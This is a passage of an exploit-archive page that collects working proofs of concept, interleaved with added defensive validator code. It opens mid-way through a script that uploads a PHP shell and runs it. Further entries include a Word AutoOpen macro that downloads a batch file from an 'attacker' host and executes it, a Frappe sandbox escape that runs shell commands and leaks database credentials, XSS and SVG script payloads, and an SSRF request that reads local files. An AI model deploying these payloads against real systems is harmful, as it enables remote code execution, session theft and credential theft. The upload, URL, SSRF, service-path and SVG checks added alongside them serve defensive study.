------WebKitFormBoundarynKy5BIIJQcZC80i2--
'''
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)

if upload_response.status_code == 200:
    print("File uploaded successfully.")
    # Execute payload
    response = session.get(payload_url)
    print("Payload executed successfully.")
else:
    print("Error uploading the file:", upload_response.text)
```
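This exploit and the Admidio one above rest on the same defect: the upload handler stores whatever extension the client names (`shell.php7`, `shell.phar`) in a directory the web server will hand to the PHP interpreter. As an added example, not code from either project, a validator for image uploads that allowlists extensions, checks the bytes against the claimed type, and ignores both the client's path and its Content-Type header (the magic-byte table is constructed for the example):

```python
import re

# Extensions this endpoint is willing to store, with the leading bytes each
# format must begin with (constructed table for the example).
ALLOWED = {
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif":  (b"GIF87a", b"GIF89a"),
}
# The stem may not contain a dot: "shell.php.png" would otherwise be stored
# with two extensions, which some server configurations treat as PHP.
SAFE_STEM = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


def validate_image_upload(filename, data):
    """Return (ok, detail). Only the allowlist decides what is accepted, so
    shell.php7, shell.phar, shell.php, .htaccess and any handler extension
    added to the server later all fail the same way."""
    # The client's directory part is untrusted; keep the final component only.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        return False, "no extension"
    stem, ext = base.rsplit(".", 1)          # split on the LAST dot only
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f".{ext} is not an allowed image type"
    if not SAFE_STEM.fullmatch(stem):
        return False, "file name must be alphanumeric"
    # The content must match the claimed type, whatever the Content-Type
    # header said in the multipart part.
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, f"content is not a {ext} image"
    # Cheap extra check against image/PHP polyglots; the real protection is
    # that the upload directory is never mapped to a script interpreter.
    if b"<?php" in data or b"<?=" in data:
        return False, "image contains a PHP open tag"
    return True, f"{stem}.{ext}"
```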
HireHackking

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com

Description:

1. Go to new post and write your payload in the body field: https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After saving it, the XSS payload will be executed and you will see the alert box.
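The payload above defeats a filter that looks for the literal string `javascript:` because the browser decodes `&Tab;` to a tab and then drops tabs when it parses the URL. An added example, not Netlify CMS code, of a URL-attribute check that does the same decoding and normalization before allowlisting the scheme, shown next to the naive substring test it replaces:

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def naive_is_safe(raw):
    """The check the payload is built to defeat: a substring test on the
    attribute value as written, before any HTML decoding."""
    return "javascript:" not in raw.lower()


def effective_url(raw):
    """Reproduce what the browser ends up with: decode character references,
    then drop the ASCII tab/LF/CR and leading C0 controls and spaces that URL
    parsing ignores."""
    text = html.unescape(raw)                 # &Tab; -> "\t", &#106; -> "j"
    text = re.sub(r"[\t\n\r]", "", text)      # java\tsc\tript: -> javascript:
    return text.lstrip("".join(chr(c) for c in range(0x21)))


def is_safe_url(raw):
    """Allowlist the scheme of the decoded, normalized value. A value without
    a scheme is a relative URL and is accepted."""
    match = _SCHEME.match(effective_url(raw))
    return match is None or match.group(1).lower() in ALLOWED_SCHEMES
```

The same rule applies to `href`, `src` and `formaction` attributes alike, and it only holds if the sanitizer works on the parsed attribute value rather than on the raw HTML text.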
HireHackking
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
## Author: nu11secur1ty
## Date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131

## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content to everyone who uses the Outlook app, whether web or local. Microsoft still doesn't have a patch against this 0-day vulnerability today.

## Status: HIGH Vulnerability

[+]Exploit:
- The malicious Word file:

```vba
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)

## Time spent: 00:30:00
HireHackking
# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.7
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36164

# PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
MTAgentService    MTAgentService    C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe    Auto

C:\Users>sc qc MTAgentService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTAgentService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTAgentService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo
Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation
HireHackking

Ateme TITAN File 3.9 - SSRF File Enumeration

#Exploit Title: Ateme TITAN File 3.9 - SSRF File Enumeration
#Exploit Author: LiquidWorm

Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.9.12.4
                  3.9.11.0
                  3.9.9.2
                  3.9.8.0

Summary: TITAN File is a multi-codec/format video transcoding software, for mezzanine, STB and ABR VOD, PostProduction, Playout and Archive applications. TITAN File is based on ATEME 5th Generation STREAM compression engine and delivers the highest video quality at minimum bitrates with accelerated parallel processing.

Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Titan File video transcoding software. The application parses user supplied data in the job callback url GET parameter. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP/DNS/File request to an arbitrary destination. This can be used by an external attacker for example to bypass firewalls and initiate a service, file and network enumeration on the internal network through the affected application.

Tested on: Microsoft Windows
           NodeJS
           Ateme KFE Software

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5781
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php

22.04.2023

--

curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \
     -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \
     -H "User-Agent: sunee-mode" \
     "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"

Call to file://C:\\windows\\system.ini returned 0

--- HTTP from Server ----------------

POST / HTTP/1.1
Host: ssrftest.zeroscience.mk
Accept: */*
Content-Type: application/xml
Content-Length: 192

<?xml version='1.0' encoding='UTF-8' ?>
<update>
  <id>0000</id>
  <name>dummy test job</name>
  <status>aborted</status>
  <progress>50</progress>
  <message>message</message>
</update>
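The defect is the absence of any check on the callback URL: any scheme and any destination are accepted, which is why `file://` works at all. An added example, not Ateme's code, of the validation a job-callback field needs: allowlist the scheme, refuse embedded credentials, and refuse IP literals or names that resolve to non-public addresses, handing the validated addresses to the HTTP client so it connects to exactly what was checked (the resolver below is constructed; no real DNS is consulted):

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses; loopback, RFC 1918,
    link-local (cloud metadata), multicast and reserved ranges all fail."""
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped               # ::ffff:127.0.0.1 is still loopback
    return addr.is_global and not addr.is_multicast


def validate_callback_url(url, resolve):
    """Return (True, [ips]) or (False, reason). `resolve(host)` is injected so
    this runs offline and so the caller can connect to the addresses that were
    validated instead of doing a second lookup an attacker could rebind."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:         # file:, gopher:, dict:, ...
        return False, f"scheme {scheme or '(none)'} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        ips = [str(ipaddress.ip_address(host))]   # IP literal: no lookup
    except ValueError:
        ips = resolve(host)
    if not ips:
        return False, f"{host} does not resolve"
    bad = [ip for ip in ips if not is_public_address(ip)]
    if bad:
        return False, f"{host} resolves to non-public {bad[0]}"
    return True, ips


# Constructed resolver for the example; 8.8.8.8 stands in for a public address.
FAKE_DNS = {
    "callback.example.com": ["8.8.8.8"],
    "intranet.example.com": ["10.0.0.8"],
    "rebind.example.com": ["8.8.8.8", "127.0.0.1"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])
```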
HireHackking
# Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)
# Exploit Author: Sander Ferdinand
# Date: 2023-06-07
# Version: 13.4.0
# Vendor Homepage: http://erpnext.org
# Software Link: https://github.com/frappe/frappe/
# Tested on: Ubuntu 22.04
# CVE : none

Silly sandbox escape.

> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.

Requirements:

- 'System Manager' role (which is not necessarily the admin)
- Server config `server_script_enabled` set to `true` (likely)

Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute the payload.

```python3
hax = "echo pwned > /tmp/pwned"
g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))
for x in g:0
```

Context:

- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/
- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6
- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script
- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42

Bonus:

More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:

```python3
hax = """
{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}
""".strip()
g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))
for x in g:0
```

Which prints the Frappe config like database/redis credentials, etc.

In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retrieve the Werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.
HireHackking

Game Jackal Server v5 - Unquoted Service Path "GJServiceV5"

# Exploit Title: Game Jackal Server v5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.allradiosoft.ru
# Software Link: https://www.allradiosoft.ru/en/ss/index.htm
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36166

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Game Jackal Server v5    GJServiceV5    C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe    Auto

C:\Users>sc qc GJServiceV5
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GJServiceV5
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Game Jackal Server v5
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo
Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation
HireHackking
# Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.avg.com
# Software Link: https://www.avg.com/en-ww/homepage#pc
# Version: 7.5
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36167

#PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
AVG Anti-Spyware Guard    AVG Anti-Spyware Guard    C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe    Auto

C:\Users>sc qc "AVG Anti-Spyware Guard"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AVG Anti-Spyware Guard
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : AVG Anti-Spyware Guard
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo
Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation
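The three unquoted-service-path entries on this page (MiniTool ShadowMaker, Game Jackal Server, AVG Anti-Spyware) share one condition: `BINARY_PATH_NAME` contains spaces and is not enclosed in quotes. An added example, not from these advisories, that audits `sc qc` output for that condition and emits the corrective `sc config` command; the sample output is constructed from the paths the three entries report:

```python
import re


def parse_sc_qc(text):
    """Parse the KEY : value lines of `sc qc <name>` output into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def split_exe_and_args(binary_path):
    """Return (exe, args, was_quoted). For an unquoted path the executable is
    taken to end at the first '.exe' followed by whitespace or end of string."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end], p[end + 1:].strip(), True
    m = re.match(r"(?i)^(.*?\.exe)(?=\s|$)(.*)$", p)
    if m:
        return m.group(1), m.group(2).strip(), False
    return p, "", False


def is_unquoted_with_spaces(binary_path):
    """The finding: an unquoted executable path that contains a space."""
    exe, _args, quoted = split_exe_and_args(binary_path)
    return (not quoted) and (" " in exe)


def fix_command(service_name, binary_path):
    """Remediation: re-register the same path with the executable quoted."""
    exe, args, _quoted = split_exe_and_args(binary_path)
    new_path = f'\\"{exe}\\"' + (f" {args}" if args else "")
    return f'sc config "{service_name}" binPath= "{new_path}"'


def audit(sc_qc_outputs):
    """Return [(service, path, fix)] for every service whose path is flagged."""
    findings = []
    for text in sc_qc_outputs:
        f = parse_sc_qc(text)
        path = f.get("BINARY_PATH_NAME", "")
        if is_unquoted_with_spaces(path):
            findings.append((f["SERVICE_NAME"], path, fix_command(f["SERVICE_NAME"], path)))
    return findings


# Constructed `sc qc` excerpts using the paths reported in the three advisories,
# plus one correctly quoted service for contrast.
SAMPLES = [
    """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MTAgentService
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\MiniTool ShadowMaker\\AgentService.exe
        SERVICE_START_NAME : LocalSystem""",
    """SERVICE_NAME: GJServiceV5
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\SlySoft\\Game Jackal v5\\Server.exe""",
    """SERVICE_NAME: AVG Anti-Spyware Guard
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Grisoft\\AVG Anti-Spyware 7.5\\guard.exe""",
    """SERVICE_NAME: GoodSvc
        BINARY_PATH_NAME   : "C:\\Program Files\\Good Vendor\\svc.exe" -run""",
]

if __name__ == "__main__":
    for service, path, fix in audit(SAMPLES):
        print(f"[!] {service}: {path}\n    {fix}")
```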
HireHackking

ProjeQtOr Project Management System v10.4.1 - Multiple XSS

Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS
Version: V10.4.1
Bugs: Multiple XSS
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download
Date found: 09.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC

### XSS-1 ###

visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=

payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E

### XSS-2 ###

steps:
1. login to account
2. go to projects and create a project
3. add attachment
4. upload svg file
"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
"""
5. Go to svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )

### XSS-3 ###

Go to the address below (post request)

POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
Host: localhost
Content-Length: 35
sec-ch-ua:
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3
Connection: close

resultAck=<script>alert(4)</script>
HireHackking

WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2023-07-10
# Vendor Homepage: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter
# Version: 1.2.2
# Tested on: windows64bit / Mozilla Firefox
# CVE : CVE-2023-37269
# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
# Video POC : https://youtu.be/Dqhq8rdrcqc

Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality

Description : WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script.

Payload:-

// image.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

//Post Request
POST /backend/system/settings/update/winter/backend/branding HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2
X-WINTER-REQUEST-HANDLER: formLogo::onUpload
Content-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206
Content-Length: 608
Origin: http://172.17.0.2
Connection: close
Cookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D

-----------------------------186411693022341939203410401206
Content-Disposition: form-data; name="file_data"; filename="image.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
-----------------------------186411693022341939203410401206--

|-----------------------------------------EOF-----------------------------------------
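This advisory and the ProjeQtOr XSS-2 entry above use the same SVG: an image upload carrying a `<script>` element that is later served inline from the site's own origin. As an added example, not WinterCMS or ProjeQtOr code, an inspector that parses an uploaded SVG and reports every active-content construct it finds; an upload is accepted only when the list comes back empty:

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Elements that can run script or embed a foreign document; a logo upload
# has no reason to contain any of them.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object",
                      "set", "animate"}
_SCHEME = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.-]*):")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def _href_is_safe(value):
    value = re.sub(r"[\t\n\r]", "", value)   # browsers drop these before parsing
    m = _SCHEME.match(value)
    return m is None or m.group(1).lower() in {"http", "https"}


def svg_active_content(data):
    """Return the reasons an uploaded SVG must be rejected; [] means inert."""
    reasons = []
    try:
        root = ET.fromstring(data)            # expat does not fetch the DTD
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        reasons.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_ELEMENTS:
            reasons.append(f"forbidden element <{tag}>")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()       # xlink:href and href both -> href
            if name.startswith("on"):
                reasons.append(f"event handler {name} on <{tag}>")
            elif name == "href" and not _href_is_safe(value):
                reasons.append(f"unsafe href on <{tag}>")
    return reasons


# The SVG from the advisory above, reproduced as test input.
ADVISORY_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>"""
```

Inspection at upload time is one layer; serving user-supplied SVG as `Content-Disposition: attachment`, or from a separate origin, removes the script's access to the site's cookies and DOM even if a construct slips through.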